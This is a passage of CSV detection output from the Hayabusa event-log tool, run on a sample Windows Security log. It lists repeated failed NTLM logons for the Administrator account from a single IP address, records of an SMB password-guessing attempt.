NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6J0d7dQUmJNKJlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QG3WU91rhTP9odx7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSQRgB8yMfhb03g1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bzbZjRXTc0XvV4Ry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k3ShOCSaLGX4YBWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lIrydzi8nmY251Z1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4vlRksTGxAqEt9j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJMnD0foEDbcNfTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNWppBJLFojEFtiF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7a9Tvr6ruDpiG2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBNIizCKz2ybc3eM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YwuXQhISpgfSFqZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeONLdrrauxqvgaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RFqSH4toadsTideV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuMa0Juj1tjL6NDY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UA8zU0kJ6gAFqSaF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: jvX85gF8wk3AGJyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpzOMKQIBrkQW5Os | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqzrLAqHNi4CHT56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HWMap8qHlykO6Yeu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pkc9LWakJBjhBQv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y43cE75gTzA1XjHF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HopaYDAbYxHjJEr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: brNgudTWJaKs8nLd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzPwOqU92kdGodBH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXlzxK5OXL9hpqrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2cLdgWvrVh7h2jPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h34xlYavVsXQRCYG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
